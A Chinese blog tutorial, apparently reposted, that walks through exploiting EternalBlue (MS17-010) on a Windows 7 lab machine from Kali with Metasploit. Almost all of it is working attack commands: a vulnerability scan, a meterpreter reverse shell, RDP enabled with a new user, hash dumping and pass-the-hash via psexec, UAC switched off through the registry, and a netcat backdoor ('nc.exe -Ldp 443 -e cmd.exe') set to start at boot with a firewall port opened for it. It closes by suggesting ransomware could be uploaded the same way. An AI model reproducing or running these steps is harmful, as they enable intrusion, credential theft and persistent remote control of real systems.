永恆之藍漏洞復現及留下隱藏后門nc及關閉主機防護開啟后門


題記

        近期我打算把我腦子里面想了很久的需要實戰的東西都完成一遍,所以頻率會非常高,活到老,學到老。時間是檢驗真理的唯一標准。

環境

        機器:kali(192.168.0.119)、win7(192.168.0.126)

        Ctrl+shift+t在kali打開2個窗口。

一、探測目標是否存在此漏洞

1、使用探測模塊探測。

        use auxiliary/scanner/smb/smb_ms17_010

        set RHOSTS 192.168.0.126

        exploit

        可以看到目標主機存在此漏洞。

二、漏洞利用

1、使用攻擊模塊

use exploit/windows/smb/ms17_010_eternalblue

Show options

2、瞄准目標

        set RHOSTS 192.168.0.126

        set payload windows/x64/meterpreter/reverse_tcp

        show options

3、進行攻擊並拿下

set lhost 192.168.0.119

exploit

三、權限連接后留后門

1、創建一個新用戶來遠程連接win7桌面。

        run post/windows/manage/enable_rdp

        run post/windows/manage/enable_rdp username=goddess password=123.com

2、kali終端連接目標

        rdesktop 192.168.0.126

        然后就能用其他用戶登錄了。

3、關閉主機防護開啟后門

        Windows密碼存放處:C:\Windows\System32\config\SAM

        Linux密碼存放處:vim /etc/shadow

3.1Hashdump獲取密碼密文

        goddess:1003:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

3.2創建防火牆規則

        Shell

        netsh firewall add portopening TCP 4444 "goddess" enable all

        exit退出

        background把權限放到后台

3.3使用hash值登錄系統(遇到不會的就開show options看缺什么)

        use exploit/windows/smb/psexec

        set payload windows/meterpreter/reverse_tcp

        set rhosts 192.168.0.126

        set lhost 192.168.0.119

        set SMBUser goddess

        set SMBPass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

        set SMBDomain WORKGROUP

        exploit

4、meterpreter > getuid

5、下面我們配置一個后門程序,修改 UAC 的注冊表,需要重啟才能生效。

        Shell

        C:\Windows\System32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

        重啟前留個后門。

        upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

        reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' 開機自啟,監聽端口為443

        shell

        防火牆允許 443 端口訪問網絡否則開機的時需要用戶點擊允許訪問網絡才可以成功執行。

        C:\Windows\system32> netsh firewall add portopening TCP 443 "goddess" ENABLE ALL 重啟

        shutdown -r -f -t 0

        重啟后用戶登錄可以看到443開啟了

        Kali使用nc監聽:nc -v 192.168.0.126 443

        或者

6、擴展

        可以像傳nc一樣上傳勒索病毒。

其他可參考文章

        http://jianshu.com/p/2f31c453c70f


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM